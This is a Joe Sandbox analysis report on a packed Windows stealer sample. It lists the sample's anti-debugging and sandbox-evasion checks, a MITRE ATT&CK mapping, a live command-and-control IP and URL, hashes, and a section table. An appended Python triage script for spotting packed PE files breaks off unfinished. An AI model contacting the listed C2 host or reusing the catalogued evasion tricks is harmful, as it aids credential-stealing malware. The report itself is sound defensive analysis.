              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_007E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_007EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007D16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007D16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_007F1BF0
              Source: file.exe, file.exe, 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1770105162.0000000001285000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.00000000012B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25621
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25493
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25629
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25474
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25641
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D4A60 VirtualProtect 00000000,00000004,00000100,?0_2_007D4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007F6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6390 mov eax, dword ptr fs:[00000030h]0_2_007F6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007F2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_007F4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_007F46A0
              Source: file.exe, file.exe, 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_007F2D60
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_007F2B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007F2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_007F2C10

              Stealing of Sensitive Information

              Source: Yara matchFile source: 00000000.00000003.1714259793.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              Source: Yara matchFile source: 00000000.00000003.1714259793.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | Create Account (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (13) | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
(Numbers in parentheses are the count of matched signatures for that technique; cells without a number had no matching signature.)


Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.phpC9l | 100% | Avira URL Cloud | malware
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/k | file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpC9l | file.exe, 00000000.00000002.1770105162.0000000001285000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1560183
                        Start date and time:2024-11-21 14:25:08 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 2m 45s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 79%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 115
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe
                        No simulations
Match: 185.215.113.206
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                        No context
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.94288861362913
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'771'008 bytes
                        MD5:215acb5ad199adeadc4c630b59f09d17
                        SHA1:76609d0d3867fa6d84da0958b5c1a954e8643f49
                        SHA256:4596bafc0efc36a8f3ec2574dba1e8ae82e5b6051a2b5cce1605057a20855072
                        SHA512:358b95a6dc92baed9822c95f23fb13196f712ab4c92587a0b13feb35649ee09ecf63b01218cdb436542e0893a824c2b09d61cd1670b879d23fd08c2ce247a850
                        SSDEEP:49152:ix2ytIT3b5pKzATXNqChzHkgcooX7hXyM:i2T3NpeATXdJHkrpC
                        TLSH:6385330342FB2D37FD2A6FB71F54AE8B03455AE99C7DD0A938C915A6588E8FC5DB8040
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0xa7f000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F89346A13EAh
pmulhuw mm3, qword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
(the rest of the entry-point listing, 93 further lines in the original, is 0x00 padding, which a 32-bit disassembler renders as the same two-byte instruction: add byte ptr [eax], al)
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x24b04d         0x61          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x24a000         0x1ac         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x24b1f8         0x8           .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity       File Type             Entropy              Characteristics
(none)    0x1000           0x249000      0x16200   e7d3a59f268adc480e251a1e56cc9e1d  unknown   unknown               unknown               unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     0x24a000         0x1ac         0x200     b555812a30166f2821e4d9ee97905df5  False     0.580078125           data                  4.537163958937117    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    0x24b000         0x1000        0x200     0d0399d83a742d5d86c5718841e8e842  False     0.134765625           data                  0.8646718654202081   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(none)    0x24c000         0x29b000      0x200     9e25d98fda001af2f290b075bcbf5010  unknown   unknown               unknown               unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
smwmjzky  0x4e7000         0x197000      0x196600  cee3b4c230a835b20eb8354ba2d13df3  False     0.9950201620655184    data                  7.9542409531412455   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
galsdkjy  0x67e000         0x1000        0x600     f53fa8c661f54c332ea7f21598e544b0  False     0.5625                data                  4.953353825760866    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant  0x67f000         0x3000        0x2200    54f5e0f2db4147eff14b06dcb3e84b02  False     0.006548713235294118  DOS executable (COM)  0.019571456231530684 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Reading the table: the entry point 0xa7f000 minus the 0x400000 image base is RVA 0x67f000, the start of .taggant (the section name the IEEE Taggant System appends to packed binaries), so execution does not begin in a linker code section. The two unnamed sections are RWX and reserve 0x249000 and 0x29b000 bytes of virtual space while carrying only 0x16200 and 0x200 bytes on disk, the typical shape of a packer's unpacking target, and smwmjzky at 7.95 bits per byte is the packed payload. Every executable section is also writable, which is what allows the stub to change section rights at run time.
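As an added example (not part of the Joe Sandbox report and not the sample's code), the Python below reproduces the static checks that make the section table above suspicious. It reads a PE section table with the standard library only, computes per-section entropy, and flags an entry point outside a linker code section, empty section names, RWX sections, high-entropy sections and sections whose virtual size dwarfs their raw size. Since the sample itself is not on the page, build_sample_pe() constructs a toy PE32 whose layout mirrors the table (an unnamed RWX section of virtual size 0x249000 with 0x200 raw bytes, a high-entropy smwmjzky section, the entry point inside .taggant); names, addresses and sizes come from the table, the section bytes are synthetic. The 7.0-bit entropy and 8x size-ratio thresholds are this example's choices, not Joe Sandbox's.

```python
import hashlib
import math
import struct
from collections import namedtuple

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code", "INIT"}  # where a linker puts the entry point

Section = namedtuple("Section", "name va vsize raw_size characteristics entropy")


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: close to 8.0 for compressed or encrypted data, 0.0 for padding."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes):
    """Return (AddressOfEntryPoint, [Section]) for a PE32 or PE32+ image, via struct only."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]   # COFF SizeOfOptionalHeader
    opt = e_lfanew + 24
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]       # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        off = opt + opt_size + i * 40                             # IMAGE_SECTION_HEADER is 40 bytes
        raw_name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        body = data[raw_ptr:raw_ptr + raw_size]
        sections.append(Section(raw_name.rstrip(b"\0").decode("latin-1"),
                                va, vsize, raw_size, chars, shannon_entropy(body)))
    return entry_rva, sections


def triage(data: bytes) -> list:
    """Packer indicators of the kind the report's section table exhibits."""
    entry_rva, sections = parse_pe(data)
    findings = []
    ep = next((s for s in sections if s.va <= entry_rva < s.va + max(s.vsize, s.raw_size)), None)
    if ep is None:
        findings.append("entry point 0x%x is outside every section" % entry_rva)
    elif ep.name not in STANDARD_CODE_SECTIONS:
        findings.append("entry point in non-standard section %r" % ep.name)
    for s in sections:
        label = s.name or "<unnamed>"
        if not s.name or not all(c.isalnum() or c in "._$" for c in s.name):
            findings.append("%s: empty or special-character section name" % label)
        if s.characteristics & RWX == RWX:
            findings.append("%s: RWX section" % label)
        if s.entropy > 7.0:                       # threshold chosen for this example
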